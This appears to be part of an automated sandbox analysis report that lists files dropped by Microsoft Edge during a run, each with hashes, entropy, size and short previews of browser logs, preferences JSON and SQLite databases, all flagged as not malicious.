                                                                                                                                                                                                                                                                                    SHA-512:B932723E6DB485F309C8250ACFBD7B5FF658E848DAAEBD6FEDC3DBB2BB6B2090DD7FAC19BDD9BCB962D8083B76B49DE998188E1157B4D0643AA9FF92273CAA8C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:30.545 1070 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-08:47:30.546 1070 Recovering log #3.2024/12/27-08:47:30.549 1070 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):422
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.24834078849334
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:iwSAv4YebvqBZFUt8drC1/+dP5LYebvqBaJ:Iy4Yebvyg8pCkLYebvL
                                                                                                                                                                                                                                                                                    MD5:3AB618A29B0D9FB06D1CC43CD7790AAB
                                                                                                                                                                                                                                                                                    SHA1:007EF83B3528F3048E13EB58ED77C656F9B124A1
                                                                                                                                                                                                                                                                                    SHA-256:83B38F610D26BAB9A9453C4BDBD85814FC1A609924D4A7778708F9070D79E232
                                                                                                                                                                                                                                                                                    SHA-512:B932723E6DB485F309C8250ACFBD7B5FF658E848DAAEBD6FEDC3DBB2BB6B2090DD7FAC19BDD9BCB962D8083B76B49DE998188E1157B4D0643AA9FF92273CAA8C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:30.545 1070 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-08:47:30.546 1070 Recovering log #3.2024/12/27-08:47:30.549 1070 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.169708197349163
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLUk+q2P923oH+TcwtpIFUt8doLveZZmw+doLveNVkwO923oH+Tcwta/WLJ:ixv4YebmFUt8d66/+d6G5LYebaUJ
                                                                                                                                                                                                                                                                                    MD5:135AFDE3636CFCE80136369FAE51120E
                                                                                                                                                                                                                                                                                    SHA1:66B4FD27C0A81B6031CC85923E0017BBF55BA404
                                                                                                                                                                                                                                                                                    SHA-256:A3EFE79C2C3F9D5781D76BAA514090A6554F262A64847AA9224044C40749759F
                                                                                                                                                                                                                                                                                    SHA-512:26EA6971DC9442A191A1B42342672772E16C7BAC94E782097D11EFCA0B255C9D04A8029D055E7785A0E79B19FAECBE75734C741D9E13A6600E12B27F730F3099
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.728 1aa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-08:47:11.729 1aa8 Recovering log #3.2024/12/27-08:47:11.729 1aa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.265343899664204
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:8/2qOB1nxCkMXSAELyKOMq+8yC8F/YfU5m+OlTLVum0:Bq+n0JX9ELyKOMq+8y9/Owr
                                                                                                                                                                                                                                                                                    MD5:30F72208E8643B2A6F79AA94A1576084
                                                                                                                                                                                                                                                                                    SHA1:082D95A9E8C064A535B0F0AC8E8E1200A4B3E4C1
                                                                                                                                                                                                                                                                                    SHA-256:D9D596EA9F42475B8D92381C33616E86D1C43A50D734EBE2A5035063B72F2D26
                                                                                                                                                                                                                                                                                    SHA-512:728C8D718351ADEC4205072BB2FB63781C8FA848F8DC35930F931AF236084ABD4BA788DE59C060114391CD1AD6F179FE42087F9F11DFA48010CDDAA243EAA9FF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.4671391673205292
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0MOS:v7doKsKuKZKlZNmu46yjx0Y
                                                                                                                                                                                                                                                                                    MD5:12AF04934BF91AC758E93C15ABA3463C
                                                                                                                                                                                                                                                                                    SHA1:A84864508A31BD16307F176AC138E20C21ADA773
                                                                                                                                                                                                                                                                                    SHA-256:13E24A97B44C261C114F8B8C385316FE1A2F5A148E9A714DAA535F874253C67A
                                                                                                                                                                                                                                                                                    SHA-512:861EB371CC19D59937DD0D24C6D1F6D93BAD3AAF38D833EB43D4C24D7B2D310B756A071B913F366608D941E9E944556EB632A49E51E704BECE4DAD3EE3A21584
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):12824
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.13716403274660352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:folvHNllv/etXlfnols/34//l/h4jRfn1d7jdtQfjl3t3JlsXtXlfI:QvSlv4w4puj3dndmld4lg
                                                                                                                                                                                                                                                                                    MD5:0E72F4FDE42152E98F1CC91A08C5D674
                                                                                                                                                                                                                                                                                    SHA1:F16CEB822830F58BC84CC5F05F347F8226795546
                                                                                                                                                                                                                                                                                    SHA-256:EF7ABABFFE394BACA6809B43F9C31722CAD8E3751EBFA31C319A13D287F76936
                                                                                                                                                                                                                                                                                    SHA-512:4699F778B2B3B8127DAD84D682422A5F77F814211D2C2316D8CE3BD291105FD63D606D25C129458C4201A4DECD86426AB45EF296275E94F0F6E20731FB49FFE0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17498), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17498
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.485527646353999
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:st5PGQSu4IsJHFfhxDo7InTwbGrQw26WSiaTYM:szOXu6lffotbGEt+iaTYM
                                                                                                                                                                                                                                                                                    MD5:112DB781D996372FD4868D9019155A6A
                                                                                                                                                                                                                                                                                    SHA1:7CCF1D7694C9DFA520F815EDF83F4062BF57DDE9
                                                                                                                                                                                                                                                                                    SHA-256:35EB6A43D802C362B3A52A64280F8F88C302EEF7A5EE26ABEA17FC58EE872865
                                                                                                                                                                                                                                                                                    SHA-512:4DCCBF909718666C1E0D60D7FF308BFE5BA698A2066E11EFE83C608C729B6DB69EEB204BFC79506EF49E914DA29E7C88FDB09092AD73C76AA690DDA1D622AA4D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11755
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                    MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                    SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                    SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                    SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17848), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17848
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.480566193234313
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:st5PGQSu4IsJHFfhxDo7InTjbGrQw26WS0laTYM:szOXu6lffo4bGEt+2aTYM
                                                                                                                                                                                                                                                                                    MD5:BC2DB189A6292DB05D44703602409409
                                                                                                                                                                                                                                                                                    SHA1:6D8C05214F097E0278511E1EB49A6A4E591A53E3
                                                                                                                                                                                                                                                                                    SHA-256:A04ED0687FE45C6E11CAB97BDD08CBA3EB562E871DBB8BC180BF9648016E6F05
                                                                                                                                                                                                                                                                                    SHA-512:0441D37842ABFB5026D64DCD929AE62DA729460101698E82DA34D4360B1508904956DCF871E47FED87D404A3EDE707847874E9CD7FDBDA24EC719DE203BBBC91
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9817
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.116053717911298
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:st5kdpIsJHFsZihUkJBZP8AbV+FSCQA66WSiaFIMYOPKYJ:st5QIsJHFfhvbGrQx6WSiaTYM
                                                                                                                                                                                                                                                                                    MD5:4DE0BDB42BE872098111C0DA367123FB
                                                                                                                                                                                                                                                                                    SHA1:41DC28CF22706F0F448BE2953A92B9D5CB3AB34F
                                                                                                                                                                                                                                                                                    SHA-256:4837A4C833F75DDA62FFF1F786D37E3A51DD932633692D5A5B2E1F990B11BD05
                                                                                                                                                                                                                                                                                    SHA-512:893E21B0BFC0A4C19B6E0DDC1E23309E890F68A85ED3BDCB0630C8AA4E1E93CF2B8DA6CA7FD53FFE70950F3085D77E0D63D7C78C8A1FC8D843E76CCEF4B847B7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                    MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                    SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                    SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                    SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17683), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17683
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.483765492157562
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:st5PGQSu4IsJHFfhxDo7InTjbGrQw26WSuaTYM:szOXu6lffo4bGEt+uaTYM
                                                                                                                                                                                                                                                                                    MD5:635BDA77410EE181E268040DDE35E885
                                                                                                                                                                                                                                                                                    SHA1:E7B4F6A3A91561C7E3E9550841D5F33913D222C8
                                                                                                                                                                                                                                                                                    SHA-256:F18D61D7128887B6F82F9611966172B43155818214901D0D4A50BE8837B209C2
                                                                                                                                                                                                                                                                                    SHA-512:AF6C85B0A62BDE7BC91D4CBD68D843C903FAC90D5A8638F85AC5FE62E8AD17F51F24C0A133DDC3F473E4BCFE743E1EFB10B065C12D14E4CCD826BA56173D377D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.10249108720695506
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:+HHt5HHt4l5spEjVl/PnnnnnnnnnnnvoQ/Eou:+HH3HHGaoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                    MD5:1FB767D35B0997FAAAB6671621151486
                                                                                                                                                                                                                                                                                    SHA1:A14887C53340F536CA0DE29EF718A1FE5663735F
                                                                                                                                                                                                                                                                                    SHA-256:42176237BF543C3232C8BA6818EF655B9A6394292AA64A25A57B568A4363105D
                                                                                                                                                                                                                                                                                    SHA-512:561B1DD15646E71EB0A1F31C6C1331C9AC7CF4D1E4DF28CBBB82255109038B90F61C570951064A7A699FB7152DC29ED1DFAF98E522008CF2C43868994E891D03
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):317272
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8884581893490862
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:G24ARxDO0Lfg5oeWg04f86WgoOuY6WgY0lM6Wgu6m46WguVbA1h6Wg9gPv8WSy0p:Eb864Y6FM6i46eq6yziV
                                                                                                                                                                                                                                                                                    MD5:9C4DDCA9D9128A9C48C19FDD588ABF8B
                                                                                                                                                                                                                                                                                    SHA1:6C5684305FF5870DA12E403789D4CCEDAAB43C64
                                                                                                                                                                                                                                                                                    SHA-256:5C5E9533B46DF3DF09CA5B789ABE0B6A7B25BDAE89DDD39C5EAB2A0211051FFC
                                                                                                                                                                                                                                                                                    SHA-512:E105D7E98ECE2B6520470B3F4D328DA7FA211D22B612D65497A666598926ED0F93A8E771601E8AABC254902ECCD0CB9FDAFD04FDD9BDB881718A22D0E7D50403
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):694
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5319671444634193
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:Wlc8NOuuuuuuuuuuuuuuuuuuuuuuPZlljZSD8E:iDAlIR
                                                                                                                                                                                                                                                                                    MD5:F86C68210E15484303C37455AC33D201
                                                                                                                                                                                                                                                                                    SHA1:E66AC42E89A9CB4E9C2A56DA87BB5F1A9A4BA151
                                                                                                                                                                                                                                                                                    SHA-256:FEEC8DF326C1B6E2C1524155A5DE8E31C9A16DC12F48FF10D89187EE475D5D58
                                                                                                                                                                                                                                                                                    SHA-512:EF8D5EC2306FF9615E871EE8E32DA830D00D00B0203A967F3036768B94E01F023F8D597D4BAB83A96C47100AB3F71C6EBDBD0478C7ACC20502C274B6C9CDAC08
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.221687936773569
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:i4/+q2P923oH+TcwtfrK+IFUt8d4/Zmw+dnfHNVkwO923oH+TcwtfrUeLJ:i4Gv4Yeb23FUt8d4//+dnfHz5LYeb3J
                                                                                                                                                                                                                                                                                    MD5:24F5A05D62A8E8DAD7A578CA0124610D
                                                                                                                                                                                                                                                                                    SHA1:63FA49149BC9B937A886D1A26CE588F250AC9FC1
                                                                                                                                                                                                                                                                                    SHA-256:4B53AE306CD068AFEE45066D4668A4D5C7FD6AEC8AF66839D2FDFF5F5A34319A
                                                                                                                                                                                                                                                                                    SHA-512:35F3E5EA2D60A51C45BE17E4F78B9B56859A0BF6FA9276E1DF647E373EC18394A14864A00D5AAA25430D8888590270CB834C889AC0D0E4E0B953903D65413F8D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.405 1788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-08:47:12.405 1788 Recovering log #3.2024/12/27-08:47:12.406 1788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.221687936773569
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:i4/+q2P923oH+TcwtfrK+IFUt8d4/Zmw+dnfHNVkwO923oH+TcwtfrUeLJ:i4Gv4Yeb23FUt8d4//+dnfHz5LYeb3J
                                                                                                                                                                                                                                                                                    MD5:24F5A05D62A8E8DAD7A578CA0124610D
                                                                                                                                                                                                                                                                                    SHA1:63FA49149BC9B937A886D1A26CE588F250AC9FC1
                                                                                                                                                                                                                                                                                    SHA-256:4B53AE306CD068AFEE45066D4668A4D5C7FD6AEC8AF66839D2FDFF5F5A34319A
                                                                                                                                                                                                                                                                                    SHA-512:35F3E5EA2D60A51C45BE17E4F78B9B56859A0BF6FA9276E1DF647E373EC18394A14864A00D5AAA25430D8888590270CB834C889AC0D0E4E0B953903D65413F8D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.405 1788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-08:47:12.405 1788 Recovering log #3.2024/12/27-08:47:12.406 1788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):787
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                    MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                    SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                    SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                    SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
